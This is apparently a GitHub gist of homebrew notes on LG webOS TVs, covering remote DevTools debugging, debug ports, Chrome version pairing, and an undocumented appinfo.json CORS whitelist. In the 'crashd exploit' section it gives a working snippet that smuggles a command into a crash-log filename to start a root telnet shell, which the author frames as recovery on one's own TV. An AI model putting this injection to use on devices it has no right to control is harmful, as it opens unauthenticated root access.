Skip to content

Instantly share code, notes, and snippets.

@throwaway96
Last active February 28, 2024 21:06
Show Gist options
  • Save throwaway96/5648720758e354a018c95150d0bb7fb8 to your computer and use it in GitHub Desktop.
Save throwaway96/5648720758e354a018c95150d0bb7fb8 to your computer and use it in GitHub Desktop.
Notes about webOS stuff

Debugging apps (inspect)

Inspectability

Developer mode apps (those installed in /media/developer) are inspectable by default. Other apps (e.g., from the LG Content Store) are not inspectable by default, but you can add "inspectable": true to their appinfo.json to enable it. Debugging system apps (i.e., those in /usr/palm/applications) may require a special flag.

Ports

The developer mode app debugger listens on port 9998.

System service and system app debugging uses ports 5885 and 9999, respectively. However, debugging for these is not normally enabled.

Inspecting an app

Go to chrome://inspect in Chrome. Check "Discover network targets".

discover-network-tarets

Click the "Configure..." button, add <TV IP>:9998, and click "Done". It will probably take a moment for Remote Targets to appear.

target-hbchannel
Homebrew Channel as a Remote Target.

Click the "inspect" link to launch a DevTools window. Select the "Console" tab in the drawer. If the drawer isn't open, you can press escape to toggle it.

Chrome version compatibility

Using newer versions of Chrome/Chromium to debug older webOS versions may not work. According to LG's documentation on App Debugging (archive), the best version of Chrome to use as a client for remote debugging is:

  • webOS 1–3: Chrome 38
  • webOS 4-5: Chrome 68
  • webOS 6+: latest version

LG also has a list of the Chromium version built into each webOS major version on their Web API and Web Engine (archive) page. Once a webOS major version is released, LG never updates the version of Chromium it uses. (And don't bother trying to do so yourself unless you really know what you're getting yourself into.)

Examples

crashd exploit

This snippet has been used to recover from Homebrew Channel becoming unelevated during an update. (You should install and elevate the Safe Updater app to make fixing such situations easier.) To use it, you need to launch Homebrew Channel on the TV, remotely inspect it as described above, and run this in the DevTools console.

webOS.service.request("luna://org.webosbrew.hbchannel.service", {
    method: "exec",
    parameters: { command: 'touch /var/log/crashd/"x;telnetd -l sh"', subscribe: false },
    onSuccess: function (res) {
      console.log("yay \ud83c\udf89", res);
    },
    onFailure: function (res) {
      console.log("fail \ud83d\ude22", res);
    },
  });

After executing this, you should be able to telnet to the TV and get a root shell. To re-elevate Homebrew Channel, run /media/developer/apps/usr/palm/services/org.webosbrew.hbchannel.service/elevate-service.

CORS whitelist

I recently came across an appinfo.json property that appears to allow an app to have a CORS whitelist. It's not listed in the LG webOS TV appinfo.json documentation (archive). I assume a CORS whitelist would only be useful for web apps.

The useCORSWhitelist property specifies the name of a JSON file containing the whitelist configuration (described below). It looks like a matching signature file (having the same name followed by .sig) is required. The signature is Base64-encoded, and decoding it yields 256 random-looking bytes. I haven't investigated what kind of signature it is or what checks it.

In the only case I've seen, the JSON configuration was named cors_whitelist.json, and the signature was in cors_whitelist.json.sig.

Format

whitelistedDomains is an array of domains (with protocol). whitelistedTypes is an array of MIME types.

Example:

{
    "whitelistedDomains": [
        "https://www.example.com",
        "https://www2.example.com"
    ],
    "whitelistedTypes": [
        "application/json",
        "text/html",
        "text/plain"
    ]
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment